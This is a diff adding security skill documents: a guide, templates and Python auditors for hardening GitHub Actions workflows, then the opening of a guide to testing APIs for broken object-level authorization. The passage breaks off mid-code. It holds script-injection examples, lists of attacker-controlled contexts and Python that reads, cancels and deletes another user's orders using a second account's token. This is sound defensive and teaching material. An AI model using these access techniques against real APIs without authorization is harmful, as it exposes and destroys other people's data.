+    schedule:
+      interval: "weekly"
+    commit-message:
+      prefix: "ci"
+```
+
+### Step 2: Minimize GITHUB_TOKEN Permissions
+
+```yaml
+# Set restrictive default permissions at workflow level
+name: CI Pipeline
+permissions: {}  # Start with no permissions
+
+on: [push, pull_request]
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read  # Only what's needed
+    steps:
+      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
+
+  deploy:
+    runs-on: ubuntu-latest
+    needs: build
+    if: github.ref == 'refs/heads/main'
+    permissions:
+      contents: read
+      deployments: write
+      id-token: write  # For OIDC-based cloud auth
+    steps:
+      - name: Deploy
+        run: echo "deploying"
+```
+
+### Step 3: Prevent Script Injection
+
+```yaml
+# VULNERABLE: User-controlled input in run step
+- run: echo "PR title is ${{ github.event.pull_request.title }}"
+
+# SECURE: Use environment variable (properly escaped by shell)
+- name: Process PR
+  env:
+    PR_TITLE: ${{ github.event.pull_request.title }}
+    PR_BODY: ${{ github.event.pull_request.body }}
+  run: |
+    echo "PR title is ${PR_TITLE}"
+    echo "PR body is ${PR_BODY}"
+
+# SECURE: Use actions/github-script for complex operations
+- uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea
+  with:
+    script: |
+      const title = context.payload.pull_request.title;
+      console.log(`PR title: ${title}`);
+```
+
+### Step 4: Secure Fork Pull Request Handling
+
+```yaml
+# DANGEROUS: pull_request_target runs with base repo permissions
+# on: pull_request_target  # AVOID unless absolutely necessary
+
+# SAFE: pull_request runs in fork context with limited permissions
+on:
+  pull_request:
+    branches: [main]
+
+# If pull_request_target is required, never checkout PR code:
+on:
+  pull_request_target:
+    types: [labeled]
+
+jobs:
+  safe-job:
+    if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    steps:
+      # NEVER do: actions/checkout with ref: ${{ github.event.pull_request.head.sha }}
+      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
+        # This checks out the BASE branch, not the PR
+```
+
+### Step 5: Protect Secrets and Environment Variables
+
+```yaml
+jobs:
+  deploy:
+    runs-on: ubuntu-latest
+    environment: production  # Requires approval
+    steps:
+      - name: Deploy with secret
+        env:
+          # Secrets are masked in logs automatically
+          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
+        run: |
+          # Never echo secrets
+          # echo "$DEPLOY_KEY"  # BAD
+          deploy-tool --key-file <(echo "$DEPLOY_KEY")
+
+      - name: Audit secret access
+        run: |
+          # Log that secret was used without exposing it
+          echo "::notice::Deploy key accessed for production deployment"
+```
+
+### Step 6: Implement Workflow Change Controls
+
+```yaml
+# Require CODEOWNERS approval for workflow changes
+# .github/CODEOWNERS
+.github/workflows/ @security-team @platform-team
+.github/actions/ @security-team @platform-team
+
+# Organization settings:
+# 1. Settings > Actions > General > Fork PR policies
+#    - Require approval for first-time contributors
+#    - Require approval for all outside collaborators
+# 2. Settings > Actions > General > Workflow permissions
+#    - Read repository contents and packages permissions
+#    - Do NOT allow GitHub Actions to create and approve PRs
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| SHA Pinning | Referencing GitHub Actions by their immutable commit SHA instead of mutable version tags |
+| Script Injection | Attack where untrusted input (PR title, branch name) is interpolated into shell commands |
+| GITHUB_TOKEN | Automatically generated token with configurable permissions scoped to the current repository |
+| pull_request_target | Dangerous event trigger that runs in the base repo context with full permissions on fork PRs |
+| Environment Protection | GitHub feature requiring manual approval before jobs accessing an environment can run |
+| CODEOWNERS | File defining required reviewers for specific paths including workflow files |
+| OIDC Federation | Using GitHub's OIDC token to authenticate to cloud providers without storing long-lived credentials |
+
+## Tools & Systems
+
+- **Dependabot**: Automated dependency updater that keeps pinned action SHAs current
+- **StepSecurity Harden Runner**: GitHub Action that monitors and restricts outbound network calls from workflows
+- **actionlint**: Linter for GitHub Actions workflow files that detects security issues
+- **allstar**: GitHub App by OpenSSF that enforces security policies on repositories
+- **scorecard**: OpenSSF tool that evaluates supply chain security practices including CI/CD
+
+## Common Scenarios
+
+### Scenario: Preventing Supply Chain Attack via Compromised Third-Party Action
+
+**Context**: A widely-used GitHub Action is compromised and its v3 tag is updated to include credential-stealing code. Repositories using `@v3` automatically pull the malicious version.
+
+**Approach**:
+1. Pin all actions to SHA digests immediately across all repositories
+2. Configure Dependabot for github-actions ecosystem to manage SHA updates
+3. Restrict GITHUB_TOKEN permissions so even compromised actions have minimal access
+4. Add StepSecurity harden-runner to detect anomalous outbound network calls
+5. Review all third-party actions and replace unnecessary ones with inline scripts
+6. Require CODEOWNERS approval for any changes to .github/workflows/
+
+**Pitfalls**: SHA pinning without Dependabot means missing legitimate security updates to actions. Overly restrictive permissions can break legitimate workflows. Using `pull_request_target` for label-based gating still exposes secrets if the workflow checks out PR code.
+
+## Output Format
+
+```
+GitHub Actions Security Audit
+================================
+Repository: org/web-application
+Date: 2026-02-23
+
+WORKFLOW ANALYSIS:
+  Total workflows: 8
+  Total action references: 34
+
+SHA PINNING:
+  [FAIL] 12/34 actions use mutable tags instead of SHA digests
+  - .github/workflows/ci.yml: actions/setup-node@v4
+  - .github/workflows/deploy.yml: aws-actions/configure-aws-credentials@v4
+
+PERMISSIONS:
+  [FAIL] 3/8 workflows have no explicit permissions (inherit default)
+  [WARN] 1/8 workflows request write-all permissions
+
+SCRIPT INJECTION:
+  [FAIL] 2 workflow steps interpolate user input directly
+  - .github/workflows/pr-check.yml:23: ${{ github.event.pull_request.title }}
+
+SECRETS:
+  [PASS] No secrets exposed in workflow logs
+  [PASS] All production deployments use environment protection
+
+SCORE: 6/10 (Remediate 5 HIGH findings)
+```

--- a/security/skills/securing-github-actions-workflows/assets/template.md
+++ b/security/skills/securing-github-actions-workflows/assets/template.md
@@ -1,0 +1,52 @@
+# GitHub Actions Security Templates
+
+## Hardened Workflow Template
+
+```yaml
+name: Secure CI Pipeline
+permissions: {}
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+    branches: [main]
+
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    steps:
+      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v4.1.1
+      - uses: step-security/harden-runner@17d0e2bd7d51742c71671bd19fa12bdc9d40a3d6  # v2.8.1
+        with:
+          egress-policy: audit
+      - name: Build
+        run: make build
+      - name: Test
+        run: make test
+```
+
+## Dependabot for Actions
+
+```yaml
+# .github/dependabot.yml
+version: 2
+updates:
+  - package-ecosystem: "github-actions"
+    directory: "/"
+    schedule:
+      interval: "weekly"
+    commit-message:
+      prefix: "ci"
+```
+
+## CODEOWNERS for Workflow Protection
+
+```
+# .github/CODEOWNERS
+.github/workflows/ @org/security-team @org/platform-team
+.github/actions/ @org/security-team
+.github/dependabot.yml @org/platform-team
+```

--- a/security/skills/securing-github-actions-workflows/references/api-reference.md
+++ b/security/skills/securing-github-actions-workflows/references/api-reference.md
@@ -1,0 +1,55 @@
+# API Reference: Securing GitHub Actions Workflows
+
+## Security Checks
+
+| Check | Risk | Severity |
+|-------|------|----------|
+| Unpinned actions (mutable tags) | Supply chain attack via tag overwrite | Medium |
+| Missing permissions block | Inherits overly broad defaults | Medium |
+| write-all permissions | Excessive token scope | High |
+| Script injection in run steps | Code execution via PR title/body | High |
+| pull_request_target trigger | Fork code runs with base permissions | High |
+| Secrets in workflow logs | Credential exposure | Critical |
+
+## Dangerous Expression Contexts
+
+| Context | Risk |
+|---------|------|
+| `github.event.pull_request.title` | Attacker-controlled PR title |
+| `github.event.pull_request.body` | Attacker-controlled PR body |
+| `github.event.issue.title` | Attacker-controlled issue title |
+| `github.event.comment.body` | Attacker-controlled comment |
+| `github.head_ref` | Attacker-controlled branch name |
+
+## SHA Pinning Format
+
+| Format | Security |
+|--------|----------|
+| `actions/checkout@v4` | Insecure - mutable tag |
+| `actions/checkout@b4ffde65f...` | Secure - immutable SHA |
+
+## Permission Scopes
+
+| Scope | Values |
+|-------|--------|
+| contents | read, write |
+| actions | read, write |
+| deployments | read, write |
+| id-token | write (for OIDC) |
+| security-events | write |
+| pull-requests | read, write |
+
+## Python Libraries
+
+| Library | Version | Purpose |
+|---------|---------|---------|
+| `yaml` | PyYAML >=6.0 | Parse workflow YAML |
+| `re` | stdlib | Pattern matching |
+| `json` | stdlib | Report output |
+| `pathlib` | stdlib | File discovery |
+
+## References
+
+- GitHub Actions Security Hardening: https://docs.github.com/en/actions/security-guides
+- StepSecurity Harden Runner: https://github.com/step-security/harden-runner
+- actionlint: https://github.com/rhysd/actionlint

--- a/security/skills/securing-github-actions-workflows/references/standards.md
+++ b/security/skills/securing-github-actions-workflows/references/standards.md
@@ -1,0 +1,30 @@
+# Standards Reference: Securing GitHub Actions
+
+## NIST SSDF (SP 800-218)
+
+### PS.1: Protect All Forms of Code
+- Workflows are code and must be reviewed and protected
+- Pin action dependencies to SHA digests
+- Minimize GITHUB_TOKEN permissions
+
+## CIS Software Supply Chain Security
+
+- BD-1: Define security requirements for build processes
+- BD-2: Automate security validation of build configurations
+- BD-3: Pin all external dependencies to immutable references
+
+## OWASP CI/CD Top 10 Risks
+
+| Risk | GitHub Actions Mitigation |
+|------|--------------------------|
+| CICD-SEC-1: Insufficient Flow Control | Environment protection rules, CODEOWNERS |
+| CICD-SEC-3: Dependency Chain Abuse | SHA pinning of actions |
+| CICD-SEC-4: Poisoned Pipeline Execution | Restrict pull_request_target, input sanitization |
+| CICD-SEC-6: Credential Hygiene | OIDC federation, minimal GITHUB_TOKEN scope |
+| CICD-SEC-9: Artifact Integrity | Sign artifacts in workflows |
+
+## SLSA Framework
+
+- Level 2: Hosted build service (GitHub Actions qualifies)
+- Level 3: Hardened build platform with isolation guarantees
+- Workflow hardening prevents provenance falsification

--- a/security/skills/securing-github-actions-workflows/references/workflows.md
+++ b/security/skills/securing-github-actions-workflows/references/workflows.md
@@ -1,0 +1,40 @@
+# Workflow Reference: Securing GitHub Actions
+
+## Hardening Checklist
+
+1. Pin all actions to SHA digests
+2. Set restrictive default permissions
+3. Sanitize all user-controlled inputs
+4. Never use pull_request_target with PR checkout
+5. Enable environment protection for production
+6. Configure CODEOWNERS for workflow files
+7. Enable Dependabot for github-actions
+8. Audit third-party actions quarterly
+9. Use OIDC instead of long-lived cloud credentials
+10. Add harden-runner for network monitoring
+
+## Permission Scoping Reference
+
+| Permission | Use Case |
+|-----------|----------|
+| contents: read | Checkout code |
+| contents: write | Create releases, push tags |
+| security-events: write | Upload SARIF results |
+| packages: write | Push container images |
+| deployments: write | Create deployment status |
+| id-token: write | OIDC cloud authentication |
+| pull-requests: write | Comment on PRs |
+
+## Script Injection Prevention
+
+```yaml
+# DANGEROUS patterns to avoid:
+run: echo "${{ github.event.issue.title }}"
+run: echo "${{ github.event.comment.body }}"
+run: echo "${{ github.head_ref }}"
+
+# SAFE alternatives:
+env:
+  TITLE: ${{ github.event.issue.title }}
+run: echo "${TITLE}"
+```

--- a/security/skills/securing-github-actions-workflows/scripts/agent.py
+++ b/security/skills/securing-github-actions-workflows/scripts/agent.py
@@ -1,0 +1,218 @@
+#!/usr/bin/env python3
+"""Agent for securing GitHub Actions workflows.
+
+Audits GitHub Actions workflow files for security issues including
+unpinned actions, excessive permissions, script injection risks,
+dangerous triggers, and missing secret protections.
+"""
+
+import json
+import re
+import sys
+from pathlib import Path
+from datetime import datetime
+
+try:
+    import yaml
+except ImportError:
+    yaml = None
+
+
+class GitHubActionsSecurityAgent:
+    """Audits GitHub Actions workflows for security vulnerabilities."""
+
+    def __init__(self, repo_path=".", output_dir="./gha_audit"):
+        self.repo_path = Path(repo_path)
+        self.output_dir = Path(output_dir)
+        self.output_dir.mkdir(parents=True, exist_ok=True)
+        self.findings = []
+
+    def _load_workflow(self, path):
+        if yaml:
+            with open(path) as f:
+                return yaml.safe_load(f)
+        with open(path) as f:
+            return {"raw": f.read()}
+
+    def find_workflows(self):
+        """Discover all workflow files in the repository."""
+        wf_dir = self.repo_path / ".github" / "workflows"
+        if not wf_dir.exists():
+            return []
+        return sorted(wf_dir.glob("*.yml")) + sorted(wf_dir.glob("*.yaml"))
+
+    def check_sha_pinning(self, workflow_path, content):
+        """Check if actions are pinned to SHA digests."""
+        unpinned = []
+        raw = content.get("raw", "") if "raw" in content else ""
+        if not raw:
+            try:
+                raw = Path(workflow_path).read_text()
+            except Exception:
+                return unpinned
+
+        for line_num, line in enumerate(raw.splitlines(), 1):
+            m = re.search(r'uses:\s+([^@\s]+)@([^\s#]+)', line)
+            if m:
+                action, ref = m.group(1), m.group(2)
+                if not re.match(r'^[a-f0-9]{40}$', ref):
+                    unpinned.append({
+                        "action": action,
+                        "ref": ref,
+                        "line": line_num,
+                        "file": str(workflow_path),
+                    })
+                    self.findings.append({
+                        "severity": "medium",
+                        "type": "Unpinned Action",
+                        "detail": f"{action}@{ref} at line {line_num}",
+                        "file": str(workflow_path),
+                    })
+        return unpinned
+
+    def check_permissions(self, workflow_path, content):
+        """Check for overly permissive GITHUB_TOKEN permissions."""
+        issues = []
+        if not isinstance(content, dict) or "raw" in content:
+            return issues
+
+        top_perms = content.get("permissions")
+        if top_perms is None:
+            issues.append({
+                "issue": "No top-level permissions defined (inherits defaults)",
+                "file": str(workflow_path),
+            })
+            self.findings.append({
+                "severity": "medium",
+                "type": "Missing Permissions",
+                "detail": "Workflow has no permissions block",
+                "file": str(workflow_path),
+            })
+
+        if top_perms == "write-all" or (isinstance(top_perms, dict) and
+                top_perms.get("contents") == "write" and
+                top_perms.get("actions") == "write"):
+            issues.append({"issue": "Overly permissive write-all", "file": str(workflow_path)})
+            self.findings.append({
+                "severity": "high",
+                "type": "Excessive Permissions",
+                "detail": "write-all permissions granted",
+                "file": str(workflow_path),
+            })
+
+        return issues
+
+    def check_script_injection(self, workflow_path, content):
+        """Check for user-controlled input in run steps (script injection)."""
+        injections = []
+        raw = content.get("raw", "") if "raw" in content else ""
+        if not raw:
+            try:
+                raw = Path(workflow_path).read_text()
+            except Exception:
+                return injections
+
+        dangerous_contexts = [
+            "github.event.pull_request.title",
+            "github.event.pull_request.body",
+            "github.event.issue.title",
+            "github.event.issue.body",
+            "github.event.comment.body",
+            "github.event.review.body",
+            "github.head_ref",
+        ]
+
+        in_run = False
+        for line_num, line in enumerate(raw.splitlines(), 1):
+            stripped = line.strip()
+            if stripped.startswith("run:") or stripped.startswith("run: |"):
+                in_run = True
+            elif in_run and not stripped.startswith("-") and not stripped.startswith("#"):
+                for ctx in dangerous_contexts:
+                    if f"${{{{ {ctx}" in line or f"${{{{{ctx}" in line:
+                        injections.append({
+                            "context": ctx,
+                            "line": line_num,
+                            "file": str(workflow_path),
+                        })
+                        self.findings.append({
+                            "severity": "high",
+                            "type": "Script Injection",
+                            "detail": f"{ctx} in run step at line {line_num}",
+                            "file": str(workflow_path),
+                        })
+            if stripped and not stripped.startswith("-") and not stripped.startswith("#") and ":" in stripped and not stripped.startswith("run"):
+                in_run = False
+
+        return injections
+
+    def check_dangerous_triggers(self, workflow_path, content):
+        """Check for dangerous event triggers."""
+        issues = []
+        if not isinstance(content, dict) or "raw" in content:
+            raw = content.get("raw", "")
+            if "pull_request_target" in raw:
+                issues.append({"trigger": "pull_request_target", "file": str(workflow_path)})
+                self.findings.append({
+                    "severity": "high",
+                    "type": "Dangerous Trigger",
+                    "detail": "pull_request_target allows fork code to run with base permissions",
+                    "file": str(workflow_path),
+                })
+            return issues
+
+        on_block = content.get("on", content.get(True, {}))
+        if isinstance(on_block, dict) and "pull_request_target" in on_block:
+            issues.append({"trigger": "pull_request_target", "file": str(workflow_path)})
+            self.findings.append({
+                "severity": "high",
+                "type": "Dangerous Trigger",
+                "detail": "pull_request_target trigger used",
+                "file": str(workflow_path),
+            })
+        return issues
+
+    def audit_all(self):
+        """Run all security checks on all workflow files."""
+        workflows = self.find_workflows()
+        results = []
+        for wf in workflows:
+            content = self._load_workflow(wf)
+            unpinned = self.check_sha_pinning(wf, content)
+            perms = self.check_permissions(wf, content)
+            injections = self.check_script_injection(wf, content)
+            triggers = self.check_dangerous_triggers(wf, content)
+            results.append({
+                "workflow": str(wf),
+                "unpinned_actions": len(unpinned),
+                "permission_issues": len(perms),
+                "script_injections": len(injections),
+                "dangerous_triggers": len(triggers),
+            })
+        return results
+
+    def generate_report(self):
+        audit = self.audit_all()
+        report = {
+            "report_date": datetime.utcnow().isoformat(),
+            "repository": str(self.repo_path),
+            "workflows_scanned": len(audit),
+            "audit_summary": audit,
+            "findings": self.findings,
+            "total_findings": len(self.findings),
+        }
+        out = self.output_dir / "gha_security_report.json"
+        with open(out, "w") as f:
+            json.dump(report, f, indent=2)
+        print(json.dumps(report, indent=2))
+        return report
+
+
+def main():
+    repo = sys.argv[1] if len(sys.argv) > 1 else "."
+    agent = GitHubActionsSecurityAgent(repo)
+    agent.generate_report()
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/securing-github-actions-workflows/scripts/process.py
+++ b/security/skills/securing-github-actions-workflows/scripts/process.py
@@ -1,0 +1,210 @@
+#!/usr/bin/env python3
+"""
+GitHub Actions Workflow Security Audit Script
+
+Analyzes workflow files for security issues including unpinned actions,
+excessive permissions, script injection risks, and insecure patterns.
+
+Usage:
+    python process.py --workflows-dir .github/workflows/ --output audit-report.json
+"""
+
+import argparse
+import json
+import os
+import re
+import sys
+from dataclasses import dataclass, field
+from datetime import datetime, timezone
+from pathlib import Path
+
+import yaml
+
+
+@dataclass
+class SecurityFinding:
+    file: str
+    line: int
+    check: str
+    severity: str
+    message: str
+    remediation: str
+
+
+SHA_PATTERN = re.compile(r"@[0-9a-f]{40}")
+TAG_PATTERN = re.compile(r"@v?\d+(\.\d+)*$")
+INJECTION_PATTERN = re.compile(r"\$\{\{\s*github\.event\.(issue|pull_request|comment|review)\.\w+")
+DANGEROUS_CONTEXTS = [
+    "github.event.issue.title",
+    "github.event.issue.body",
+    "github.event.pull_request.title",
+    "github.event.pull_request.body",
+    "github.event.comment.body",
+    "github.event.review.body",
+    "github.head_ref",
+]
+
+
+def load_workflow(filepath: str) -> dict:
+    """Load a GitHub Actions workflow YAML file."""
+    try:
+        with open(filepath, "r") as f:
+            return yaml.safe_load(f) or {}
+    except (yaml.YAMLError, FileNotFoundError):
+        return {}
+
+
+def check_action_pinning(workflow: dict, filepath: str) -> list:
+    """Check if actions are pinned to SHA digests."""
+    findings = []
+    filename = os.path.basename(filepath)
+
+    for job_name, job in workflow.get("jobs", {}).items():
+        for i, step in enumerate(job.get("steps", [])):
+            uses = step.get("uses", "")
+            if not uses or uses.startswith("./"):
+                continue
+            if not SHA_PATTERN.search(uses):
+                findings.append(SecurityFinding(
+                    file=filename, line=0,
+                    check="ACTION_PINNING",
+                    severity="HIGH",
+                    message=f"Job '{job_name}' step {i}: '{uses}' not pinned to SHA digest",
+                    remediation=f"Pin to SHA: {uses.split('@')[0]}@<commit-sha>"
+                ))
+    return findings
+
+
+def check_permissions(workflow: dict, filepath: str) -> list:
+    """Check for overly permissive GITHUB_TOKEN permissions."""
+    findings = []
+    filename = os.path.basename(filepath)
+
+    top_perms = workflow.get("permissions")
+    if top_perms is None:
+        findings.append(SecurityFinding(
+            file=filename, line=0,
+            check="PERMISSIONS",
+            severity="MEDIUM",
+            message="No top-level permissions defined. Inherits default (may be write-all).",
+            remediation="Add 'permissions: {}' at workflow level and grant per-job."
+        ))
+    elif top_perms == "write-all" or (isinstance(top_perms, dict) and
+                                       all(v == "write" for v in top_perms.values())):
+        findings.append(SecurityFinding(
+            file=filename, line=0,
+            check="PERMISSIONS",
+            severity="HIGH",
+            message="Workflow has write-all permissions.",
+            remediation="Restrict to minimum required permissions per job."
+        ))
+    return findings
+
+
+def check_script_injection(workflow: dict, filepath: str) -> list:
+    """Check for script injection via user-controlled inputs."""
+    findings = []
+    filename = os.path.basename(filepath)
+
+    for job_name, job in workflow.get("jobs", {}).items():
+        for i, step in enumerate(job.get("steps", [])):
+            run_cmd = step.get("run", "")
+            if not run_cmd:
+                continue
+            for ctx in DANGEROUS_CONTEXTS:
+                if f"${{{{ {ctx}" in run_cmd or f"${{{{{ctx}" in run_cmd:
+                    findings.append(SecurityFinding(
+                        file=filename, line=0,
+                        check="SCRIPT_INJECTION",
+                        severity="CRITICAL",
+                        message=f"Job '{job_name}' step {i}: '{ctx}' interpolated in run step",
+                        remediation="Use env variable: env: VAR: ${{ " + ctx + " }} then ${VAR}"
+                    ))
+    return findings
+
+
+def check_pr_target(workflow: dict, filepath: str) -> list:
+    """Check for dangerous pull_request_target usage."""
+    findings = []
+    filename = os.path.basename(filepath)
+
+    triggers = workflow.get("on", {})
+    if isinstance(triggers, dict) and "pull_request_target" in triggers:
+        for job_name, job in workflow.get("jobs", {}).items():
+            for step in job.get("steps", []):
+                uses = step.get("uses", "")
+                if "checkout" in uses:
+                    with_ref = step.get("with", {}).get("ref", "")
+                    if "pull_request" in with_ref or "head" in with_ref:
+                        findings.append(SecurityFinding(
+                            file=filename, line=0,
+                            check="PR_TARGET_CHECKOUT",
+                            severity="CRITICAL",
+                            message=f"Job '{job_name}': pull_request_target with PR code checkout",
+                            remediation="Never checkout PR code in pull_request_target workflows."
+                        ))
+    return findings
+
+
+def main():
+    parser = argparse.ArgumentParser(description="GitHub Actions Security Audit")
+    parser.add_argument("--workflows-dir", required=True)
+    parser.add_argument("--output", default="actions-security-report.json")
+    parser.add_argument("--fail-on-findings", action="store_true")
+    args = parser.parse_args()
+
+    workflows_dir = os.path.abspath(args.workflows_dir)
+    all_findings = []
+
+    workflow_files = list(Path(workflows_dir).glob("*.yml")) + list(Path(workflows_dir).glob("*.yaml"))
+    print(f"[*] Auditing {len(workflow_files)} workflow files in {workflows_dir}")
+
+    for wf_path in workflow_files:
+        workflow = load_workflow(str(wf_path))
+        if not workflow:
+            continue
+
+        all_findings.extend(check_action_pinning(workflow, str(wf_path)))
+        all_findings.extend(check_permissions(workflow, str(wf_path)))
+        all_findings.extend(check_script_injection(workflow, str(wf_path)))
+        all_findings.extend(check_pr_target(workflow, str(wf_path)))
+
+    severity_counts = {}
+    for f in all_findings:
+        severity_counts[f.severity] = severity_counts.get(f.severity, 0) + 1
+
+    report = {
+        "metadata": {
+            "directory": workflows_dir,
+            "date": datetime.now(timezone.utc).isoformat(),
+            "workflows_scanned": len(workflow_files)
+        },
+        "summary": {
+            "total_findings": len(all_findings),
+            "severity_counts": severity_counts
+        },
+        "findings": [
+            {"file": f.file, "check": f.check, "severity": f.severity,
+             "message": f.message, "remediation": f.remediation}
+            for f in sorted(all_findings,
+                            key=lambda x: {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3}.get(x.severity, 4))
+        ]
+    }
+
+    output_path = os.path.abspath(args.output)
+    with open(output_path, "w") as f:
+        json.dump(report, f, indent=2)
+    print(f"[*] Report: {output_path}")
+
+    for f in all_findings:
+        print(f"  [{f.severity}] {f.file}: {f.message}")
+
+    passed = len(all_findings) == 0
+    print(f"\n[{'PASS' if passed else 'FAIL'}] {len(all_findings)} security findings")
+
+    if args.fail_on_findings and not passed:
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/testing-api-for-broken-object-level-authorization/SKILL.md
+++ b/security/skills/testing-api-for-broken-object-level-authorization/SKILL.md
@@ -1,0 +1,394 @@
+---
+name: testing-api-for-broken-object-level-authorization
+description: 'Tests REST and GraphQL APIs for Broken Object Level Authorization (BOLA/IDOR)
+  vulnerabilities where an authenticated user can access or modify resources belonging
+  to other users by manipulating object identifiers in API requests. The tester intercepts
+  API calls, identifies object ID parameters (numeric IDs, UUIDs, slugs), and systematically
+  replaces them with IDs belonging to other users to determine if the server enforces
+  per-object authorization. This is OWASP API Security Top 10 2023 risk API1. Activates
+  for requests involving BOLA testing, IDOR in APIs, object-level authorization testing,
+  or API access control bypass.
+
+  '
+domain: cybersecurity
+subdomain: api-security
+tags:
+- api-security
+- owasp
+- bola
+- idor
+- authorization
+- rest-security
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1552.001
+- T1027
+- T1070
+---
+# Testing API for Broken Object Level Authorization
+
+## When to Use
+
+- Assessing REST or GraphQL APIs that use object identifiers in URL paths, query parameters, or request bodies
+- Performing OWASP API Security Top 10 assessments where API1:2023 (BOLA) must be tested
+- Testing multi-tenant SaaS applications where users from different tenants should not access each other's data
+- Validating that API endpoints enforce per-object authorization checks beyond just authentication
+- Evaluating APIs after new endpoints are added to ensure authorization middleware is applied consistently
+
+**Do not use** without written authorization from the API owner. BOLA testing involves accessing or attempting to access other users' data, which requires explicit permission.
+
+## Prerequisites
+
+- Written authorization specifying the target API endpoints and scope of testing
+- At least two test accounts with different privilege levels and distinct data sets
+- Burp Suite Professional or OWASP ZAP configured as an intercepting proxy
+- Authentication tokens (JWT, session cookies, API keys) for each test account
+- API documentation (OpenAPI/Swagger spec) or access to enumerate endpoints
+- Python 3.10+ with `requests` library for scripted testing
+- Autorize Burp extension installed for automated BOLA detection
+
+## Workflow
+
+### Step 1: API Endpoint Discovery and Object ID Mapping
+
+Enumerate all API endpoints and identify parameters that reference objects:
+
+**From OpenAPI/Swagger Specification:**
+```bash
+# Download and parse the OpenAPI spec
+curl -s https://target-api.example.com/api/docs/swagger.json | python3 -m json.tool
+
+# Extract all endpoints with path parameters
+curl -s https://target-api.example.com/api/docs/swagger.json | \
+  python3 -c "
+import json, sys
+spec = json.load(sys.stdin)
+for path, methods in spec.get('paths', {}).items():
+    for method, details in methods.items():
+        if method in ('get','post','put','patch','delete'):
+            params = [p['name'] for p in details.get('parameters',[]) if p.get('in') in ('path','query')]
+            if params:
+                print(f'{method.upper()} {path} -> params: {params}')
+"
+```
+
+**From Burp Suite Traffic:**
+1. Browse the application as User A, exercising all features that involve data creation and retrieval
+2. In Burp, go to Target > Site Map and filter for API paths (e.g., `/api/v1/`, `/graphql`)
+3. Look for patterns: `/api/v1/users/{id}`, `/api/v1/orders/{order_id}`, `/api/v1/documents/{doc_uuid}`
+4. Note the object ID format: sequential integers (predictable), UUIDs (less predictable), or encoded values
+
+**Classify Object ID Types:**
+
+| ID Type | Example | Predictability | BOLA Risk |
+|---------|---------|---------------|-----------|
+| Sequential Integer | `/orders/1042` | High - increment/decrement | Critical |
+| UUID v4 | `/orders/550e8400-e29b-41d4-a716-446655440000` | Low - random | Medium (if leaked) |
+| Encoded/Hashed | `/orders/base64encodedvalue` | Medium - decode and predict | High |
+| Composite | `/users/42/orders/1042` | High - multiple IDs to swap | Critical |
+| Slug | `/profiles/john-doe` | Medium - guess usernames | High |
+
+### Step 2: Baseline Request Capture with Authenticated User
+
+Capture legitimate requests for User A and User B:
+
+```python
+import requests
+
+BASE_URL = "https://target-api.example.com/api/v1"
+
+# User A credentials
+user_a_token = "Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9..."
+user_a_headers = {"Authorization": user_a_token, "Content-Type": "application/json"}
+
+# User B credentials
+user_b_token = "Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9..."
+user_b_headers = {"Authorization": user_b_token, "Content-Type": "application/json"}
+
+# Step 1: Identify User A's objects
+user_a_profile = requests.get(f"{BASE_URL}/users/me", headers=user_a_headers)
+user_a_id = user_a_profile.json()["id"]  # e.g., 1001
+
+user_a_orders = requests.get(f"{BASE_URL}/users/{user_a_id}/orders", headers=user_a_headers)
+user_a_order_ids = [o["id"] for o in user_a_orders.json()["orders"]]  # e.g., [5001, 5002]
+
+# Step 2: Identify User B's objects
+user_b_profile = requests.get(f"{BASE_URL}/users/me", headers=user_b_headers)
+user_b_id = user_b_profile.json()["id"]  # e.g., 1002
+
+user_b_orders = requests.get(f"{BASE_URL}/users/{user_b_id}/orders", headers=user_b_headers)
+user_b_order_ids = [o["id"] for o in user_b_orders.json()["orders"]]  # e.g., [5003, 5004]
+
+print(f"User A (ID: {user_a_id}): Orders {user_a_order_ids}")
+print(f"User B (ID: {user_b_id}): Orders {user_b_order_ids}")
+```
+
+### Step 3: BOLA Testing - Horizontal Privilege Escalation
+
+Attempt to access User B's objects using User A's authentication:
+
+```python
+import json
+
+results = []
+
+# Test 1: Access User B's profile with User A's token
+resp = requests.get(f"{BASE_URL}/users/{user_b_id}", headers=user_a_headers)
+results.append({
+    "test": "Access other user profile",
+    "endpoint": f"GET /users/{user_b_id}",
+    "auth": "User A",
+    "status": resp.status_code,
+    "vulnerable": resp.status_code == 200,
+    "data_leaked": list(resp.json().keys()) if resp.status_code == 200 else None
+})
+
+# Test 2: Access User B's orders with User A's token
+for order_id in user_b_order_ids:
+    resp = requests.get(f"{BASE_URL}/orders/{order_id}", headers=user_a_headers)
+    results.append({
+        "test": f"Access other user order {order_id}",
+        "endpoint": f"GET /orders/{order_id}",
+        "auth": "User A",
+        "status": resp.status_code,
+        "vulnerable": resp.status_code == 200
+    })
+
+# Test 3: Modify User B's order with User A's token
+resp = requests.patch(
+    f"{BASE_URL}/orders/{user_b_order_ids[0]}",
+    headers=user_a_headers,
+    json={"status": "cancelled"}
+)
+results.append({
+    "test": "Modify other user order",
+    "endpoint": f"PATCH /orders/{user_b_order_ids[0]}",
+    "auth": "User A",
+    "status": resp.status_code,
+    "vulnerable": resp.status_code in (200, 204)
+})
+
+# Test 4: Delete User B's resource with User A's token
+resp = requests.delete(f"{BASE_URL}/orders/{user_b_order_ids[0]}", headers=user_a_headers)
+results.append({
+    "test": "Delete other user order",
+    "endpoint": f"DELETE /orders/{user_b_order_ids[0]}",
+    "auth": "User A",
+    "status": resp.status_code,
